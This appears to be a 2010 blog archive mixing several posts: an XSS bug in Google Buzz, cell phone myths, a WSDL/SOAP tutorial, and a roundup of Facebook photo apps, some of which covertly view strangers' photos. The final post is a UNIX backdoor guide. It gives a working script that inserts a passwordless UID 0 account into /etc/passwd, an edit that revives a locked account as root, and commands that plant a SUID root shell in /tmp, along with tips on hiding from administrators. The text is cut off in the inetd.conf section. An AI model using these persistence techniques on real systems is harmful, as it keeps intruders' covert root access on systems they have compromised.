Saturday, February 20, 2010

XSS IN GOOGLE BUZZ

You may or may not have noticed, but I was on hiatus for a few days. As you’re probably aware (and I’m sure many of you celebrate) it was Chinese New Year on February 14th so I was offline for a few days taking a well deserved break.

I’d like to wish all of you that celebrate it a Happy Chinese New Year.

Anyway, the big news during this period, especially in the whole social networking scene, has been Google Buzz. Is it the next challenger to Twitter or FriendFeed or even Facebook? Personally I think not, but it sure has got people talking.

Google has fixed a cross-site scripting bug that allowed attackers to take control of Google Buzz accounts. The bug affects the mobile version of Buzz and was reported Feb. 16 by SecTheory CEO Robert Hansen. Google patched the vulnerability the same day. According to Hansen, news of the flaw was passed along to him by a hacker with the moniker of TrainReq.

“There [are] four things of note here,” Hansen blogged. “Firstly, it’s on Google’s domain, not some other domain like Google Gadgets or something. So, yes, it’s bad for phishing and for cookies. Secondly, it’s over SSL/TLS [Secure Sockets Layer/Transport Layer Security] (so no one should be able to see what’s going on, right?). Third, it could be used to hijack Google Buzz—as if anyone is using that product (or at least you shouldn’t be). And lastly, isn’t it ironic that Google is asking to know where I am on the very same page that’s being compromised?”

The news from the last few days included a cross-site scripting flaw in the mobile version of Google Buzz.

It was fixed promptly because the researcher who discovered it was kind enough to tell Google about it.

As always, though, if a flaw was discovered and reported this quickly, how many more are out there being quietly exploited by the bad guys?

Hansen was referring to the location feature in Buzz that shows where Buzz users are when they post. This feature can be turned off by the user.

“We have no indication that the vulnerability was actively abused,” a Google spokesperson said. “We understand the importance of our users’ security, and we are committed to further improving the security of Google Buzz.”

In the week since Buzz was launched Feb. 9, Google has faced criticism over privacy issues associated with the service. On Feb. 16, the Electronic Privacy Information Center filed a complaint with the Federal Trade Commission that charged Google with failing to protect users’ privacy. In an interview with eWEEK, Google Vice President of Product Management Bradley Horowitz said the company did not expect the negative response that Google Buzz received on the privacy issue.

There was also a big outcry about privacy when Buzz was launched due to the fact that it automatically populates your following list with people you often converse with.

Imagine if you’d been hunting for a new job and talking to someone from a competitor and your boss saw it? Or a husband chatting with another woman and his wife saw who he was ‘following’? There are a lot of permutations, none of which are good, so use your imagination.

eWeek also did another article about the privacy concerns here – Buzz Privacy Backlash.

Source: eWeek

Friday, February 19, 2010

Lucky or Unlucky?

Cell phone Myths

The internet is rife with rumors about the miracles of cellular technology, as well as the dangers.  Depending on who you believe you may be carrying around a miracle tool or a death trap in your pants and Lord knows that’s a lot of stress for one person to deal with.  Best to get to the bottom of things and separate truth from fiction.

1. Your cell phone can unlock your car
No one seems to know where this story came from, but it’s been circulated in a number of emails.  The basic idea is that you’re out and about and in your frenzy to get things done, you lock your keys in the car.  Crap.  But, being clever and knowing you have a spare set complete with keyless entry at home, you call home and have someone press the button on your spare set to unlock your car over the phone.  The signal goes through the phone, to your car and you’re driving again.  Now that’s crafty.
http://www.youtube.com/watch?v=0bjQMzI9m5w
So popular is this myth that the Mythbusters themselves had to test it.  Guess what they discovered… you’re going to be pointing your phone at your car for a long, long time.
The problem is the phone uses an audio frequency while your keyless entry is on a much higher radio frequency.  Which is to say you’re dealing with apples and oranges and once that keyless frequency hits your cell phone, it’s not going to get translated through to the other side at the same frequency.  So no, you can’t unlock your car with your cell phone, unless you plan on using it to break a window.

2. Cell phones cause gas pump explosions
This winner has become so ingrained in our minds that gas stations actually have signs asking you to not use your phone while at the pumps for fear of a massive fireball of death and destruction, all because you needed to say goodnight to grandma.  But when’s the last time you saw this happen on the news?
As it turns out, in the entire history of the entire world, there has never been an incident where someone blew themselves or any gas stations up with a cell phone.  It’s a complete fabrication.
According to Snopes, the story just showed up one day in 1999.  And every time it got mentioned, they said the explosion happened somewhere else.  So basically it’s a friend of a friend story, only in this case the friend is an explosion, and no one’s ever seen it in person.
The Cellular Telecommunications Industry Association and the American Petroleum Institute both agree that phones just don’t blow things up and they’ve never seen any evidence to suggest they do.  Any news reports that have attributed fires to the use of phones were later proved false when someone, you know, actually looked for the real cause.

3. Cell phones cause deaths in hospitals
Similar to the no-phones rule at the gas pumps, most hospitals have signs in place telling you to turn off your phone.  While some allow phone use in designated areas, which us regular folks assume must be lead-shielded rooms or some such, other hospitals ban them altogether.  The fear is that cell phone signals may interfere with the machines being used to keep people alive.  There are even reports that the use of cell phones in hospitals has been a contributing factor in the death or serious injury of patients as a result of machines malfunctioning, delivering incorrect amounts of medication and so on.
However, the FDA has no information whatsoever on cell phones causing any deaths in hospitals, nor has any medical journal mentioned it.  Reports that cell phone interference has caused incubators, heart monitors and IV pumps to go all wonky are the main cause behind the cell phone bans in hospitals; however, the evidence for these is also sketchy.  Just what is it that would cause the problem, anyway?
In 2007, the Mayo Clinic decided to do a study to see what the effect of cell phone interference was, so they used phones near 200 different pieces of hospital equipment.  The end result was that they observed no clinically important interference at all.
So are you safe using a phone in a hospital?  Probably, just keep in mind that if they have signs up and you refuse to put the phone away, they can and will have security take you out.  In 1998, a man in Massachusetts was pepper sprayed for not hanging up.  Probably best just to leave a message and call back later.

4. Cell phones cause cancer
This is the biggest one you’re going to find online with the most confusing answers.  There are literally hundreds, if not thousands, of websites that will assure you that cell phone use leads to brain tumors.
Dr Vini Khurana, a reputable neurosurgeon who trained at the Mayo Clinic, even wrote a paper back in 2008 that said cell phone usage caused more cancer than smoking or asbestos.  If you just said “holy crap” you’re well within your rights, as that’s a pretty damning statement.  But there is a but.
According to the World Health Organization, and more than 30 other scientific reviews, cell phones do not pose a cancer risk.  And, apparently, Dr. Khurana’s work had not even been peer reviewed when it was released.
In a nutshell, cancer is caused by DNA mutations.  Some kind of radiation or chemical has to break down chemical bonds in our cells that lead to mutation.  But the radiation from a cell phone, the electromagnetic kind which is released by all kinds of electronics, is not strong enough to strip away electrons or break down chemical bonds, at least according to most scientists.  So cell phones just physically can’t cause cancer.   But why do people think they do?
Nearly every study on the link between cancer and cell phone use takes the time to point out that while no link was found, the risk of long-term use requires further study.  Meaning that we found nothing, but if we kept going for a few years, maybe we would.  And leaving the door open like that has let people who are primed and ready to panic over their ear growing a second head walk right in.

5. Your cell phone can set you on Fire
Probably one of the last things you want your phone to do is spontaneously combust, especially if it’s in your pocket or, you know, against your head.  For the most part we like to think there are hard-working men and women out there ensuring that the products we use from day to day just don’t do that.  And while most things are pretty safe, very few things are 100% safe.
Back in 2004, a teen in California was walking with her phone in her back pocket when, as witnesses say, it made a whoosh sound, bulged a little, then spewed forth fist-sized flames.  The girl suffered second-degree burns.
So how could such a nutty thing happen?  An overheated battery.  Kyocera issued a recall of 140,000 batteries, and the Consumer Product Safety Commission has issued recalls as well for certain batteries that can short-circuit, overheat and, yes, burst into flame.
There have been other reported incidents of phones bursting into flames while charging as well, and though it’s rare, it actually can happen.  It seems to have been the result of poor-quality batteries, though, rather than your phone being angry at the poor grammar in your texts, as you might think.

6. Your phone can spy on you
This one has been a favorite of conspiracy nuts for the last few years: the idea that the government can tap into your phone and use it to track your whereabouts, or even turn on the microphone and listen in on your conversations, whether or not you’re using the phone at that moment.
In fact, it’s true that the FBI has used this technique, called a “roving bug”, to eavesdrop on criminals, like in New York when it was used as a surveillance tool in an organized crime investigation.  Traditional wiretapping of land lines is a bit too old school and criminals are on to it, so the FBI had to adapt.  Since many phones never fully power down unless the battery is totally removed, a cell phone is a perfect wireless transmitter for law enforcement to tap into, and it still falls under the purview of existing wiretapping laws.
In other cases, though judges have batted the attempts down due to a lack of probable cause, law enforcement has attempted to get access to information about cell phone use – locations of cell towers that took calls from individuals, strength and angle of signal, and timing of calls – which would allow them to approximate the location of an individual.  You’ve seen it on television and in movies before and, for all intents and purposes, it’s fairly accurate.  With access to cell company records, you could be tracked in real time based on your cell phone usage, or even just by having the phone on and in your possession.

7. Your cell phone can explode
If you’re the kind of person who figures a cell phone fire is no big deal, you may be more inclined to be slightly nervous of cell phone explosions.  After all, fire can be our friend and let us roast weenies and such.  Explosions just suck, by and large.
Back in 2007, word came out of Korea that a man who had his cell phone in his shirt pocket died when the phone blew up, sending shrapnel into his heart and lungs.  Last year in China, a man died shortly after changing his phone battery when the same thing happened.  It was the 9th recorded phone explosion in the country over a seven year period.
In one incident, a man working in an iron mill died when, as investigators determined, the heat of the mill caused the liquid in his phone’s battery to overheat and blow up.  So it may be rare, but it can happen.  Let that be a lesson to you: never expose your phone to molten metal.

8. Cell phones cause infertility
Potentially the most horrible rumor of all, at least for some people, is the one that says cell phones lower your sperm count.  And apparently it’s true.
Research conducted at the Center for Reproductive Medicine at the Glickman Urological and Kidney Institute at the Cleveland Clinic in Ohio suggests that there’s a chance using a cell phone is bad news for your boys if you’re the hands-free type who keeps the phone in your pocket. Long-term exposure to all that electromagnetic radiation so close to the goods may lead to an increase in body temperature.  And that can affect sperm count as well as motility and shape.
The jury’s still out, of course, and odds are you need to be doing a lot of talking with the phone in your pocket, but to be on the safe side you could keep the phone a couple of inches away.  You never know.

Tuesday, February 16, 2010

INTRODUCTION TO WSDL

In the past few years, a number of standards proposals have emerged to provide a key piece of the XML middleware story: networked service requests. These are a way to request XML-related functionality from a remote machine over a network such as the Internet.

This has led to a standards race including notable entries such as Allaire Corp's Web Distributed Data eXchange (WDDX) (see Resources), UserLand Inc's XML Remote Procedure Call (XML-RPC), and the Simple Object Access Protocol (SOAP) from Dave Winer, IBM, Microsoft, and others (see Resources). At the same time, some developers have even done quite well building applications over plain old HTTP. The biggest growth area for such XML-based networked services has been in content exchange and syndication.

Similarly, there have also been a number of proposals for defining the descriptions and structure of such content. Of these, the notable ones include Information Content Exchange (ICE) from Vignette Corp and its partners (see Resources), and the RDF (Resource Description Framework) Site Summary (RSS) from Netscape and its partners (see Resources). Many developers have also done very well using the common Internet standard of Multipurpose Internet Messaging Extensions (MIME).

There are many, many other XML protocol initiatives out there; enough so that the W3C has a brand new XML Protocol Working Group just for addressing these issues (see Resources). It should be very interesting to watch the political sparks fly as the W3C tries to extract something coherent from this welter.

In this bewildering array of ways to communicate between Web applications, a clear need has emerged for a mechanism to describe XML-based network services regardless of communications protocol and request structure. With such a mechanism many advanced Web development tasks could gain an additional measure of automation. For example:

  • Portal toolkits could provide a plug-in system for content sections to make it easier for designers to pick from a wide range of on-line services without delving into a lot of technical details.
  • Industry groups and service brokers could publish comprehensive white pages and yellow pages of on-line XML services, allowing developers to make quick technological assessments and comparisons.
  • Service providers could quickly publish updates and versions of their request structures in a standard format to help automate adoption by developers.

IBM, Ariba, and Microsoft set out to craft just such a mechanism, and on September 25th emerged with the Web Services Description Language (WSDL) version 1.0 (see Resources). It is rather odd that this "1.0" spec was pretty much under wraps until then; thus the XML community was left with no chance at a public review before the release date. At any rate, WSDL is a format for describing networked XML services, filling a large portion of the need I described earlier.

Background

WSDL occupies a space crowded with precedents, many of them overlapping specifications. Let's take a brief look at the menagerie to provide some background. WebMethods' Web Interface Definition Language (WIDL), one of the pioneering specifications for describing remote Web services, was an XML format that took an approach familiar to users of remote procedural technologies such as RPC and CORBA: accessing functionality on a remote machine as if it were on a local machine. There was some fit between WIDL and the XML-RPC system by UserLand. The former has since faded away, as message-based XML technologies have proven more popular than their procedural equivalents. The latter seems to be giving way to SOAP, which has support for message-oriented as well as procedural approaches.

SOAP describes envelope and message formats, and has a basic request/response handshake protocol. Additionally, Microsoft developed the SOAP Contract Language (SCL) earlier this year to provide a system for on-line service descriptions for SOAP-based applications. This work in SCL, in addition to other protocols and related work from IBM and Ariba, has pretty much been phased into WSDL.

Just before WSDL emerged, a consortium of 36 companies, including IBM, Ariba, and Microsoft, launched the Universal Description, Discovery and Integration (UDDI) system (see Resources), an initiative to provide a standard directory of on-line business services with an elaborate API for querying the directories and service providers.

Microsoft kept itself busy in the area of Web services description before WSDL emerged. It had created another entrant, Discovery of Web Services (DISCO) (see Resources), which is now in limbo, outside Microsoft's official .NET strategic plan. DISCO describes how to find ("discover") SCL descriptions of services that match particular requirements. Frankly, reading the DISCO spec, it is hard to make heads or tails of the value it was supposed to provide, but whatever it had of use has since been sprinkled into UDDI and WSDL.

Parallel to Microsoft's efforts on SCL, IBM was creating the Network Accessible Service Specification Language (NASSL) (see Resources). One can see that IBM threw its NASSL ideas fully into WSDL, along with its NASSL editors. IBM also got into the services discovery act with its Advertisement and Discovery of Services (ADS). There doesn't appear to have ever been a formal specification of ADS, though the Web Services Toolkit from IBM's alphaWorks project has a reference implementation of it (see Resources).

If you are thoroughly confused by now, you're in good company. More than one wag has quipped that XML is a specification with no other use but to spawn scads of other specifications. The formation of the UDDI group is supposed to help in the area of service description. Out of the current spaghetti should emerge a simple order, creating an overall protocol for deployment of Web-based services. This will probably be in the form of separate but linked formats for service discovery, description, request/response protocol, request structure and data-typing, semantic discovery, and, of course, transport protocol. Figure 1 offers a suggested diagram representing this order and placing the various specifications I've mentioned accordingly. Hopefully, it will help clear up the landscape. Within this picture, WSDL handles the specific purpose of a description mechanism for services.


Figure 1. Service roles and interactions

Sample WSDL document

Let's look at how WSDL works with SOAP through the following example. Let us say we are the entrepreneurs behind the imaginary company snowboard-info.com, an intrepid snowboarding industry database providing a service that allows others to query endorsements from snowboard manufacturers. A client can send a request to retrieve this information from a server using a SOAP request like the one in Listing 1. In natural language, Listing 1 encapsulates the question "Which professional snowboarder endorses the K2 FatBob?"


Listing 1. A SOAP 1.1 Request
POST /EndorsementSearch HTTP/1.1
Host: www.snowboard-info.com
Content-Type: text/xml; charset="utf-8"
Content-Length: 261
SOAPAction: "http://www.snowboard-info.com/EndorsementSearch"

<SOAP-ENV:Envelope
  xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
  SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <m:GetEndorsingBoarder xmlns:m="http://namespaces.snowboard-info.com">
      <manufacturer>K2</manufacturer>
      <model>Fatbob</model>
    </m:GetEndorsingBoarder>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

In response, the server can send the SOAP 1.1 response (sans HTTP header) message for the foregoing request as shown in Listing 2. In natural language, it encapsulates the simple string response "Chris Englesmann".


Listing 2. A SOAP 1.1 Response
<SOAP-ENV:Envelope
  xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
  SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <m:GetEndorsingBoarderResponse xmlns:m="http://namespaces.snowboard-info.com">
      <endorsingBoarder>Chris Englesmann</endorsingBoarder>
    </m:GetEndorsingBoarderResponse>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Now, the overall structure of requests, the relevant data types, the schema of the XML elements used, and other such matters are left to the trading partners by the SOAP specification itself. WSDL provides a standard for service specification that unites the types of requests and the requirements needed to process them.

In order to get all the hot snowboarding portals and discussion sites hooked up to our system, we might want to define WSDL communications ports. We do so by releasing the WSDL description of our point of service, as shown in Listing 3 (a WSDL description for a snowboarding endorsement query).

First, a bit of reassurance. Listing 3 may seem long, but WSDL is actually quite simple. Our sample WSDL document not only uses nearly every facet of WSDL, it also has a hefty chunk of XML Schema and also takes advantage of the SOAP binding to WSDL. This last portion, though presented in the same service description, is technically an extension to the standard service description.

The whole thing is enclosed in the <definitions> element, which describes a set of related services. The <types> element allows the specification of low-level data-typing for the message or procedure contents. Different mechanisms are permitted through namespace extensibility, but XML Schemas are likely to be the choice for most users, and that is what our example uses. It specifies a simple element content model that you can see matches the sample exchange in Listing 1 and Listing 2. WSDL provides a system for importing data-type specifications located as separate resources, and there could be several such resources in cases of complex messages in multiple usage domains.
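
To make this concrete, here is a sketch of what the types portion of Listing 3 could look like, derived from the elements exchanged in Listings 1 and 2 (the schema dialect and the choice of target namespace are assumptions, not confirmed details of the original listing):

```xml
<types>
  <schema targetNamespace="http://namespaces.snowboard-info.com"
          xmlns="http://www.w3.org/1999/XMLSchema">
    <!-- The request element seen in Listing 1 -->
    <element name="GetEndorsingBoarder">
      <complexType>
        <sequence>
          <element name="manufacturer" type="string"/>
          <element name="model" type="string"/>
        </sequence>
      </complexType>
    </element>
    <!-- The response element seen in Listing 2 -->
    <element name="GetEndorsingBoarderResponse">
      <complexType>
        <sequence>
          <element name="endorsingBoarder" type="string"/>
        </sequence>
      </complexType>
    </element>
  </schema>
</types>
```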

The <message> element defines the data format of each individual transmission in the communication. In our case, one message represents the EndorsingBoarder request and the other the response. In our example, this is a simple statement that the body of the message is a particular element from the schema in the types section. The breaking of a transmission into message parts depends on the logical view of the data. For instance, if the transmission is a remote procedure call, the message might be divided into multiple parts, one of which is the procedure name and meta-data and the rest of which are the procedure parameters. There is naturally a relationship between the granularity of the data-typing and the break-down of the message into parts.
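
For our service, the message definitions might be sketched as follows (the message names, and the es: prefix assumed to be bound to our target namespace, are illustrative rather than taken from the original listing):

```xml
<!-- Each message has a single logical part: the body element
     defined in the types section above -->
<message name="GetEndorsingBoarderRequest">
  <part name="body" element="es:GetEndorsingBoarder"/>
</message>
<message name="GetEndorsingBoarderResponse">
  <part name="body" element="es:GetEndorsingBoarderResponse"/>
</message>
<!-- A fault message; here assuming xsd is bound to the XML Schema namespace -->
<message name="GetEndorsingBoarderFault">
  <part name="errorMessage" type="xsd:string"/>
</message>
```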

The <portType> element groups messages that form a single logical operation. For instance, in our case, we can have an EndorsingBoarder request which triggers an EndorsingBoarder response or, in case of error or exception, an EndorsingBoarderFault. This particular exchange is grouped together into a WSDL port type. As you can see, the relationship to messages is made by qualified name reference.
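
That grouping might be expressed like this (the port type name is inferred from the binding discussion below; the operation and message names are assumptions consistent with Listings 1 and 4):

```xml
<portType name="GetEndorsingBoarderPortType">
  <!-- input followed by output: a request-response operation -->
  <operation name="GetEndorsingBoarder">
    <input message="es:GetEndorsingBoarderRequest"/>
    <output message="es:GetEndorsingBoarderResponse"/>
    <fault name="error" message="es:GetEndorsingBoarderFault"/>
  </operation>
</portType>
```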

There are only four forms of operations with built-in support in WSDL: one-way, request-response, solicit-response, and notification. The latter two are simply the "inverse" of the first two, the only difference being whether the end point in question is on the receiving or sending end of the initial message. Basically, WSDL supports unidirectional (one-way and notification) and bidirectional (request-response and solicit-response) port types. Faults are only supported in the bidirectional port types, unlike the CORBA model -- I'll leave the inevitable controversy between the two approaches right there for now.

The WSDL document so far has moved from the concrete and physical (data typing) to the abstract and logical (messages and port types), with some reference between the two. The <binding> element is the bit that firmly provides the connection between the logical and physical models. In this case, it takes the operation we have defined through the abstract port type and connects it to a concrete description of how it is transmitted through SOAP. Here is where we come to the SOAP extensions to WSDL I mentioned earlier. WSDL also provides bindings to bare-metal HTTP and MIME, and full extensibility to other protocols.

Our sample binding specifies the GetEndorsingBoarderPortType as having the SOAP "style" of Document. The style can be RPC or Document, the former indicating a more procedural bent to the communication and the latter a message-exchange bent. Of course, the dividing line between these is quite broad, and I can imagine much fruitless discussion over whether a given port type is one or the other. My bias in this debate is to use Document nearly everywhere.

Our binding also specifies the network transport as HTTP -- SOAP can be transmitted by other means, such as SMTP. The <operation> elements within the binding get down to the grit, mapping the individual messages in the port type to definitions of the SOAP transmissions that actuate them. Note that we specify a soapAction, which is required for SOAP over HTTP. The given value must be used in the HTTP headers of the actual messages in order to signal the "intent" of the message. This will supposedly allow intelligent proxying and firewalling of SOAP traffic some day.
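
Putting those binding details together, a sketch of the SOAP binding might look like the following. The binding name comes from Listing 4 and the soapAction value from the HTTP header in Listing 1; the use="literal" setting is an assumption:

```xml
<binding name="EndorsementSearchSoapBinding"
         type="es:GetEndorsingBoarderPortType">
  <!-- Document style over the standard SOAP HTTP transport -->
  <soap:binding style="document"
                transport="http://schemas.xmlsoap.org/soap/http"/>
  <operation name="GetEndorsingBoarder">
    <!-- Matches the SOAPAction header in Listing 1 -->
    <soap:operation
        soapAction="http://www.snowboard-info.com/EndorsementSearch"/>
    <input><soap:body use="literal"/></input>
    <output><soap:body use="literal"/></output>
  </operation>
</binding>
```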

The final element, <service>, defines a physical location for a communication end-point. It uses the port type and binding specified earlier, and basically gives the Web address or URI for a particular provider of the described service. Naturally, in our example, it is the address where we have set up our SOAP server to traffic in snowboard product endorsement queries.
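
A sketch of the primary service element, modeled directly on the European mirror shown in Listing 4, with the address taken from the request in Listing 1 (the service name itself is an assumption):

```xml
<service name="EndorsementSearchService">
  <documentation>snowboard-info.com Endorsement Service</documentation>
  <port name="GetEndorsingBoarderPort"
        binding="es:EndorsementSearchSoapBinding">
    <soap:address
        location="http://www.snowboard-info.com/EndorsementSearch"/>
  </port>
</service>
```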

However, what if, once we launched the service, it turned out to be a hit with users, and traffic began to overwhelm our server? We might decide to set up a mirror, perhaps in Europe. In this case, the service is exactly the same, but we provide a separate URI from which it can be obtained. In the WSDL scheme of things, all we'd have to do to make this happen is modify our WSDL document to add another <service> element, such as the one in Listing 4.


Listing 4. An alternative <service> element for handling multiple sites
<service name="EndorsementSearchEuropeanService">
   <documentation>snowboarding-info.com Endorsement Service European
      Mirror</documentation>
   <port name="GetEndorsingBoarderPort"
      binding="es:EndorsementSearchSoapBinding">
      <soap:address location="http://www.snowboard-info.co.uk/EndorsementSearch"/>
   </port>
</service>

Notice the different service name and address. Now any users who find this WSDL document through whatever means of service discovery will have two options for where to make the actual request.

A few general comments on our WSDL example. You can see that WSDL leans heavily on XML namespaces. The XML namespace given in the <definitions> element's targetNamespace attribute is by default attached to all the names used for the other top-level WSDL elements. Developers can use qualified names to refer to these elements using prefixes from the particular namespace declarations in scope. Note that the default namespaces are not applied to un-prefixed names within WSDL attributes. This is consistent with other places where the XML namespaces mechanism has been borrowed for use in disambiguating names in the character data of XML specifications. XML namespaces are also used to connect WSDL elements (and elements from binding extensions) to the data-typing provided in the <types> element. In our example, we use the default namespace, http://schemas.xmlsoap.org/wsdl/, to indicate the official elements of WSDL. However, the spec explicitly leaves wide open the option of extending the core elements using elements in other namespaces.
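
That namespace machinery would be set up on the root element roughly as follows (a sketch; the es: prefix and the choice of target namespace are assumptions consistent with Listing 4):

```xml
<definitions name="EndorsementSearch"
    targetNamespace="http://namespaces.snowboard-info.com"
    xmlns:es="http://namespaces.snowboard-info.com"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
    xmlns="http://schemas.xmlsoap.org/wsdl/">
  <!-- The types, message, portType, binding, and service elements
       go here; their names default to the targetNamespace, so
       es:... qualified references resolve to them -->
</definitions>
```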

Overall this example is quite simple. It describes communication consisting of short SOAP transmissions, with two input strings and one output in each operation. WSDL could just as easily define multiple port types consisting of a myriad of messages that use the full, extraordinary range of XML Schemas. Then again, at least in the short term, simpler communications between XML service providers and users are more likely to succeed.



Monday, February 15, 2010

Applications for photos in Facebook

Facebook photo tools

Photo Album Strip Photo Album Strip is a great app. After you install it on your profile, it will allow you to change the designations for your albums to anything you want. You can also change their colors, reduce the number of picture categories, or hide those that you don't want your friends to see. It's an extremely simple app, but it works well and it's one of the more convenient apps in this roundup. It's definitely worth trying out.

Photo Album Strip

Photo Album Strip gives you some ideas for photo album categories.

(Credit: Screenshot by Don Reisinger/CNET)

Photo Box Photo Box is similar to Flickr. It allows you to tag your photos and share those with friends. You can also arrange them based on the topic of the photos. But perhaps the most appealing aspect of Photo Box is that it tracks how many people have viewed your images. That should give you some insight into what your friends like. Overall, Photo Box is a pretty simple app, but it's worth trying out.

Photo Box

Photo Box brings Flickr-like features to Facebook.

(Credit: Screenshot by Don Reisinger/CNET)

Photo Finder Photo Finder is a neat service that, so far, is in private alpha. Instead of forcing you to talk to friends to be tagged in photos, Photo Finder does it for you. It analyzes all the photos on Facebook to see if you're in them. If so, it displays the photos and which profile they're on.

Unfortunately, Photo Finder is still a work in progress. It failed to find pictures of me or my wife even though I intentionally "untagged" images. That said, it did find a couple of pictures of my friend when I asked him to use the app. So, for right now, your mileage will vary with Photo Finder. But it's still a neat app.

Photo Finder

Photo Finder couldn't find pictures of me on Facebook.

(Credit: Screenshot by Don Reisinger/CNET)

Photo Mosaic Photo Mosaic will allow you to create an image out of all your Facebook photos. You'll need 50 photos to do that, but as long as you have them, you'll create some really neat images. I'm not too sure how useful Photo Mosaic is, though. It's a great app to have on-hand whenever you want to create a neat picture, but for the most part, it's a novelty that you probably won't find yourself using too often. Regardless, it's worth checking out.

Photo Mosaic

Photo Mosaic helps you create a mosaic in three steps.

(Credit: Screenshot by Don Reisinger/CNET)

Photo Stalker If it frustrates you that you can't see other users' images unless you're friends with them, Photo Stalker is for you. After installing it, the app lets you view any photo on Facebook without the user knowing it.

After using it, I wasn't too impressed by Photo Stalker. It does work, and using it couldn't be easier, but the interface is suspect. I had trouble accessing profile pictures unless I used the person's Facebook ID as the query. Although it worked as advertised, it was a little frustrating to use.

Photo Stalker

Photo Stalker lets you see photos of Facebook users you're not friends with.

(Credit: Screenshot by Don Reisinger/CNET)

Photo Surfer Photo Surfer is the best anonymous photo viewer I've used on Facebook. Unlike Photo Stalker, Photo Surfer makes it quick and easy to find the photos you're looking for.

After it's installed, all of your friends' profiles are listed. When you click on one of those profiles, you can see all their photos. If you're looking to see photos from those you aren't friends with, the app's search feature is second to none. It found everyone I searched for. It was fantastic. That said, pictures that users have set to private can't be viewed. Regardless, it's a great app that you should definitely try out.

Photo Surfer

Photo Surfer lets you see what others' photos look like.

(Credit: Screenshot by Don Reisinger/CNET)

Private Photo Gallery Private Photo Gallery is a useful app if you don't want users to see your Facebook photos. But with so many ads, it can be quite annoying.

When you first start using Private Photo Gallery, you have to choose which friends will be allowed to see your photos. After that, the service will block photo viewing from the rest of your friends. Each day, you can allow up to 10 friends who request to see your photos access to them. After you exceed that 10-person limit, you can either choose to wait until tomorrow to accept more requests or upgrade to a premium account, which costs $5.99 per month. It allows for unlimited request acceptance, no ads, and an unlimited number of pictures you can keep private. It's expensive, but given the sheer number of ads in the free version, it might be worth it if you like this app enough. If not, stick with the free version.

Private Photo Gallery

Private Photo Gallery has a lot of ads.

(Credit: Screenshot by Don Reisinger/CNET)


Sunday, February 14, 2010

HOW TO CREATE A BACKDOOR IN UNIX

Know the location of critical system files. This should be obvious (if you can't list any off the top of your head, stop reading now, get a book on UNIX, read it, then come back to me...). Be familiar with passwd file formats (including the general 7-field format, system-specific naming conventions, shadowing mechanisms, etc.). Know vi. Many systems will not have those robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful when you need to quickly search and edit a large file. If you are connecting remotely (via dial-up/telnet/rlogin/whatever) it's always nice to have a robust terminal program with a nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc.



The permanence of these backdoors will depend completely on the technical savvy of the administrator. An experienced and skilled administrator will be wise to many (if not all) of these backdoors. But if you have managed to steal root, it is likely the admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time to come. One major thing to be aware of is that if you can cover your tracks during the initial break-in, no one will be looking for backdoors.







The Overt



[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of re-entry. It flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply prepend or append it. Anyone casually examining the passwd file will see this. So, why not stick it in the middle...



#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# daemon9@netcom.com

set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...



NEVER, EVER, change the root password. The reasons are obvious.



[2] In a similar vein, enable a disabled account as UID 0, such as sync. Or perhaps an account somewhere buried deep in the passwd file has been abandoned and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second field).
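The edit in [2] is mechanical enough to script. A sketch of the substitution on a sample line (the account name "olduser" and its fields are made up for illustration; never run an untested edit blindly against the live file):

```shell
# Sample passwd line for an abandoned, locked account (fields are made up).
line='olduser:*:1047:20:Old User:/home/olduser:/bin/csh'
# Clear the '*' lock in field 2 and force the UID (field 3) to 0.
newline=`echo "$line" | sed 's/^olduser:\*:[0-9]*:/olduser::0:/'`
echo "$newline"
```

To apply it for real you would run the same sed over a copy of /etc/passwd, inspect the result, then move it into place with the original mode (644) preserved.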



[3] Leave an SUID root shell in /tmp.



#!/bin/sh
# Everyone's favorite...

cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that...
chmod 4755 /tmp/.evilnaughtyshell



Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may notice... but, hey, this *is* the overt section. I will not detail the changes necessary because they can be quite system specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
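For reference, a /tmp line in /etc/fstab that blocks SUID execution might look like this (the device name and filesystem type are placeholders; exact option syntax varies by UNIX flavor):

```
/dev/sd0g   /tmp   ufs   rw,nosuid   0   2
```

The fields are: device, mount point, filesystem type, mount options, dump frequency, and fsck pass number. If the nosuid option is present, your /tmp shell from [3] will sit there uselessly until you remove it.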







The Veiled



[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some background info: the Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the appropriate program (usually a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical lines look like this:



(1)    (2)     (3)   (4)     (5)    (6)               (7)
ftp    stream  tcp   nowait  root   /usr/etc/ftpd     ftpd
talk   dgram   udp   wait    root   /usr/etc/ntalkd   ntalkd



